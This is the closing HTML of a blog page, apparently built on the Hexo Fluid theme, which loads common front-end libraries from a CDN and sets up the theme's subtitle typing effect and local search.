<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
